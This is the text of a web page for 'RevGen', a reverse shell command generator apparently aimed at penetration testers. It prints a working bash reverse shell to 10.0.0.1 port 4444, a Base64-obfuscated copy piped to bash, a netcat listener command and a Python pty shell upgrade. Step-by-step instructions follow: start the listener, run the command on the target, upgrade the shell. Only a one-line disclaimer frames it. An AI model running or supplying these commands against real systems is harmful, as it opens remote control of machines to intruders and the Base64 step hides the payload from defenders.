RevGen

Secure.

Reverse Shell Command Generator

Generate reverse shell commands for multiple platforms with customizable parameters. Simple, secure, and ready for your penetration testing needs.

Multiple Shells

Support for Bash, Python, Perl, PHP, Netcat, and PowerShell

Instant Generation

Real-time command generation with copy to clipboard

Base64 Encoding

Obfuscate commands with automatic Base64 encoding

Reverse Shell Command Generator

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Adjust parameters above to customize the command

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE=
Base64 encoded command for obfuscation echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE=" | base64 -d | bash

⚠️ For educational purposes only. Always ensure you have proper authorization before using these commands.

Usage Instructions

1. Configure your listener

nc -lvnp 4444

Start a netcat listener on your attacking machine to receive the connection.

2. Execute the shell

Run the generated command on the target system to establish the connection.

3. Upgrade your shell (optional)

python -c 'import pty;pty.spawn("/bin/bash")'

For a more stable and feature-rich shell experience.